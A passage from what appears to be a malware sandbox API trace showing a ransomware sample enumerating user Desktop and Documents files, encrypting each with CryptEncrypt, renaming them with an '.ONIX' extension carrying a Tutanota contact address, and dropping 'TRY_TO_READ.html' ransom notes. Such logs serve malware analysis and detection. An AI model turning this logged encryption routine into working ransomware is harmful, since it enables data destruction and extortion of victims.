returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.543] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4891) returned 1 [0120.543] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x131b [0120.543] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.543] GetProcessHeap () returned 0x410000 [0120.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473158 [0120.543] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473158*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473158*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.545] WriteFile (in: hFile=0x4a4, lpBuffer=0x473158*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473158*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.547] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.548] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x131b) returned 0x4dab68 [0120.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x131b) returned 0x4dbe90 [0120.549] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.549] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x131b, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x131b, lpOverlapped=0x0) returned 1 [0120.549] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-4891, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.549] WriteFile (in: hFile=0x4a4, lpBuffer=0x4dbe90*, nNumberOfBytesToWrite=0x131b, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dbe90*, lpNumberOfBytesWritten=0x367f44c*=0x131b, lpOverlapped=0x0) returned 1 [0120.550] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x131b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.550] CloseHandle (hObject=0x4a4) returned 1 [0120.551] GetProcessHeap () returned 0x410000 [0120.551] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473158 | out: hHeap=0x410000) returned 1 [0120.551] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xjerjijuhjv27y.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJErJIJuhjv27y.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xjerjijuhjv27y.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.554] GetProcessHeap () returned 0x410000 [0120.554] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.554] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f516c0, ftCreationTime.dwHighDateTime=0x1d5e323, ftLastAccessTime.dwLowDateTime=0x7935f90, ftLastAccessTime.dwHighDateTime=0x1d5db90, ftLastWriteTime.dwLowDateTime=0x7935f90, ftLastWriteTime.dwHighDateTime=0x1d5db90, nFileSizeHigh=0x0, nFileSizeLow=0x674d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zw7PKyR8Tn9X29H.ots", cAlternateFileName="ZW7PKY~1.OTS")) returned 1 [0120.554] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zw7pkyr8tn9x29h.ots"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.554] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.554] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x674d, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.554] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.554] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.555] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.555] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.555] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x473050 | out: pbBuffer=0x473050) returned 1 [0120.555] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.555] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots", dwFileAttributes=0x80) returned 1 [0120.555] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots") returned 58 [0120.556] GetProcessHeap () returned 0x410000 [0120.556] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0120.556] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots" [0120.556] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.556] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=26445) returned 1 [0120.556] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x674d [0120.556] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.556] GetProcessHeap () returned 0x410000 [0120.556] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473158 [0120.556] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473158*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473158*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.556] WriteFile (in: hFile=0x4a4, lpBuffer=0x473158*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473158*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.558] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.559] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.560] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x674d) returned 0x4dab68 [0120.560] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x674d) returned 0x4e12c0 [0120.560] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.560] ReadFile (in: hFile=0x4a4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x674d, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x674d, lpOverlapped=0x0) returned 1 [0120.561] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-26445, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.561] WriteFile (in: hFile=0x4a4, lpBuffer=0x4e12c0*, nNumberOfBytesToWrite=0x674d, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e12c0*, lpNumberOfBytesWritten=0x367f44c*=0x674d, lpOverlapped=0x0) returned 1 [0120.562] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x674d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.562] CloseHandle (hObject=0x4a4) returned 1 [0120.563] GetProcessHeap () returned 0x410000 [0120.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473158 | out: hHeap=0x410000) returned 1 [0120.563] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zw7pkyr8tn9x29h.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zw7PKyR8Tn9X29H.ots.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zw7pkyr8tn9x29h.ots.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.566] GetProcessHeap () returned 0x410000 [0120.566] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.566] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f516c0, ftCreationTime.dwHighDateTime=0x1d5e323, ftLastAccessTime.dwLowDateTime=0x7935f90, ftLastAccessTime.dwHighDateTime=0x1d5db90, ftLastWriteTime.dwLowDateTime=0x7935f90, ftLastWriteTime.dwHighDateTime=0x1d5db90, nFileSizeHigh=0x0, nFileSizeLow=0x674d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zw7PKyR8Tn9X29H.ots", cAlternateFileName="ZW7PKY~1.OTS")) returned 0 [0120.566] CloseHandle (hObject=0x3cc) returned 1 [0120.566] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.566] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x3b, wMilliseconds=0x3b2)) [0120.566] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0120.567] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0120.567] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0120.567] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents9c354ca09c354b444c.lock") returned 63 [0120.567] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0120.567] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.568] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.568] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1ae8 [0120.568] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48edf0 [0120.568] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0120.568] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1763bc30, ftCreationTime.dwHighDateTime=0x1d5b377, ftLastAccessTime.dwLowDateTime=0xf44691d0, ftLastAccessTime.dwHighDateTime=0x1d5e2f8, ftLastWriteTime.dwLowDateTime=0xf44691d0, ftLastWriteTime.dwHighDateTime=0x1d5e2f8, nFileSizeHigh=0x0, nFileSizeLow=0x19d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-0QxZvs_DoIjqLYqr0.xlsx", cAlternateFileName="-0QXZV~1.XLS")) returned 1 [0120.568] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-0qxzvs_doijqlyqr0.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.568] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.568] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x19d9, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.569] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.569] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.569] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.569] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.570] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x473050 | out: pbBuffer=0x473050) returned 1 [0120.570] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.570] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx", dwFileAttributes=0x80) returned 1 [0120.570] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx") returned 64 [0120.570] GetProcessHeap () returned 0x410000 [0120.570] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x449878 [0120.570] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx" [0120.570] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.570] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=6617) returned 1 [0120.570] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x19d9 [0120.570] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.570] GetProcessHeap () returned 0x410000 [0120.570] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473158 [0120.570] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473158*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473158*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.570] WriteFile (in: hFile=0x4a8, lpBuffer=0x473158*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473158*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.572] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.573] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.574] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x19d9) returned 0x4dab68 [0120.574] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x19d9) returned 0x4dc550 [0120.574] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.574] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x19d9, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x19d9, lpOverlapped=0x0) returned 1 [0120.574] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-6617, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.574] WriteFile (in: hFile=0x4a8, lpBuffer=0x4dc550*, nNumberOfBytesToWrite=0x19d9, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dc550*, lpNumberOfBytesWritten=0x367f44c*=0x19d9, lpOverlapped=0x0) returned 1 [0120.576] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x19d9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.576] CloseHandle (hObject=0x4a8) returned 1 [0120.577] GetProcessHeap () returned 0x410000 [0120.577] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473158 | out: hHeap=0x410000) returned 1 [0120.577] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-0qxzvs_doijqlyqr0.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-0QxZvs_DoIjqLYqr0.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-0qxzvs_doijqlyqr0.xlsx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.579] GetProcessHeap () returned 0x410000 [0120.579] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.580] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23a004d0, ftCreationTime.dwHighDateTime=0x1d5d83a, ftLastAccessTime.dwLowDateTime=0xbb1bac50, ftLastAccessTime.dwHighDateTime=0x1d5dcd7, ftLastWriteTime.dwLowDateTime=0xbb1bac50, ftLastWriteTime.dwHighDateTime=0x1d5dcd7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="12SpzcCRuJ", cAlternateFileName="12SPZC~1")) returned 1 [0120.580] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\12SpzcCRuJ\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\12spzccruj\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.581] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x299d08f0, ftCreationTime.dwHighDateTime=0x1d5d8c2, ftLastAccessTime.dwLowDateTime=0x1404c970, ftLastAccessTime.dwHighDateTime=0x1d5da29, ftLastWriteTime.dwLowDateTime=0x1404c970, ftLastWriteTime.dwHighDateTime=0x1d5da29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1GhE7oLen48NSiDRZ3w", cAlternateFileName="1GHE7O~1")) returned 1 [0120.581] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1GhE7oLen48NSiDRZ3w\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1ghe7olen48nsidrz3w\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.583] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc271e340, ftCreationTime.dwHighDateTime=0x1d5e630, ftLastAccessTime.dwLowDateTime=0xbd64a430, ftLastAccessTime.dwHighDateTime=0x1d5e1b4, ftLastWriteTime.dwLowDateTime=0xbd64a430, ftLastWriteTime.dwHighDateTime=0x1d5e1b4, nFileSizeHigh=0x0, nFileSizeLow=0xfaad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5Fxbu9vadpZOJj.docx", cAlternateFileName="5FXBU9~1.DOC")) returned 1 [0120.583] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5fxbu9vadpzojj.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.583] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.583] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xfaad, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.583] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.584] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.584] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.584] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, 